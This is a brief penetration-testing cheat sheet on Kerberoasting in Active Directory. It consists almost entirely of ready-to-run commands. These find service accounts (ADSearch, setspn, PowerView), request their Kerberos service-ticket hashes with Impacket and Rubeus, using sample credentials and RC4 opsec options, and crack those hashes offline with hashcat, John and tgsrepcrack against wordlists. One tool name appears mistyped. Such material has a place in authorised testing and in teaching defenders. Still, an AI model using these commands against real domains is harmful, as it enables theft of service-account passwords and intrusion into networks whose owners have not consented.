Kerberoasting
Discovery Kerberos Account
# ADSearch
ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName
# Setspn
PS C:\> setspn -T vulnableone.local -Q */*
# PowerView
Get-DomainUser -SPN | select serviceprincipalname
# AD-Module
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
# Impacket
impacket-GetUserSPNs vulnableone.local/svc:Passvord123 -dc-ip 10.10.10.10 -request
# Rubeus
Rubeus.exe kerberoast /simple /nowrap
Rubeus.exe kerberoast /user:svc /nowrap
Rubeus.exe kerberoast /stats
Rubeus.exe kerberoast /rc4opsec /outfile:C:\Users\khan.chanthou\Desktop\hashes.txt
Rubeus.exe kerberoast /rc4opsec /domain:vulnableone.local /outfile:C:\Users\khan.chanthou\Desktop\hashes.txt
Crack Hash
Hashcat
hashcat -m 13100 -a 0 hash.txt /usr/share/wordlist/rockyou.txt
John
kirb2j0hn ticket.kirbi > crackfile
john --format=krb5tgs crackfile --wordlist=10k-worst-pass.txt
Crack with kerberos tool
python /usr/share/kerberoast/tgsrepcrack.py wordlist.txt 1-40a50000-svc@HTTP~WEB.vulnableone.local-VULNABLEONE.LOCAL.kirbi
Last updated